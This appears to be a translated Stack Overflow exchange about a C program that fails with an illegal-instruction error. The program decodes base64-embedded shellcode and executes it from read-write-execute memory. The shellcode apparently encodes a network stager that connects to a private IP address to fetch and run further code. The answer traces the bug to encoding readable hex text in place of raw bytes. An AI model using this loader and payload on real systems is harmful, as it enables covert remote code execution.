我有一个c应用程序,它解码包含一些外壳代码的base64字符串,并尝试执行它,它看起来解码成功,但当它执行时,出现错误Illegal instruction: 4
。下面是大部分代码:
unsigned char shellcode[] = "eDZheDAweDVmeDY4eDAweDEweDAweDAweDVleDZheDA3eDVheDY4eDAyeDEweDAweDAweDQxeDVheDZheDAweDQxeDU4eDZheDAweDQxeDU5eDY4eGM1eDAweDAweDAyeDU4eDBmeDA1eDBmeDgyeDc0eDAweDAweDAweDQ5eDg5eGM0eDZheDAweDQxeDVheDZheDBheDQxeDVieDZheDAyeDVmeDZheDAxeDVleDZheDAweDVheDY4eDYxeDAweDAweDAyeDU4eDBmeDA1eDcyeDMzeDQ4eDg5eGM3eDQ4eGI4eDAweDAyeDA0eGQzeGMweGE4eDAweDAyeDUweDU0eDVleDZheDEweDVheDY4eDYyeDAweDAweDAyeDU4eDBmeDA1eDcyeDE2eDRjeDg5eGU2eDY4eDAweDEweDAweDAweDVheDY4eDFkeDAweDAweDAyeDU4eDBmeDA1eDcyeDAzeDQxeGZmeGQ0eDQ5eGZmeGNieDc0eDFleDZheDAweDVmeDZheDAweDVleDZheDAweDVheDZheDAweDQxeDVheDZheDAweDZheDA1eDU0eDQxeDU4eDY4eDVkeDAweDAweDAyeDU4eDBmeDA1eGVieDk3eDY4eDAxeDAweDAweDAyeDU4eDZheDAxeDVmeDBmeDA1Cg==";
char buffer[4096];
int bufferLen = 4096;
int main() {
base64decode(buffer, shellcode, sizeof(shellcode));
printf("%s", buffer);
void *ptr = mmap(NULL, bufferLen, (PROT_READ | PROT_WRITE | PROT_EXEC), (MAP_PRIVATE | MAP_ANONYMOUS), -1, 0);
memcpy(ptr, buffer, bufferLen);
int (*ret)() = (int(*)())ptr;
ret();
}
这意味着外壳代码是完整的,但它仍然有错误。
我在这里使用base64解码函数:https://github.com/rapid7/metasploit-framework/blob/master/data/headers/windows/base64.h
发布于 2019-06-10 00:19:38
问题出在编码的字符串上。被编码的数据是人类可读的字符串。相反,您需要对原始二进制数据进行编码。
例如,您可以将数据放入文件中。你可以写一个C问题来帮你做到这一点。然后将文件作为输入定向到base64
中(或者通过管道将其从您的程序直接传送到base64
)。请记住,您的数据可能包含值为零的字节,因此您需要使用fwrite
或write
将其写出。
https://stackoverflow.com/questions/56515920
复制相似问题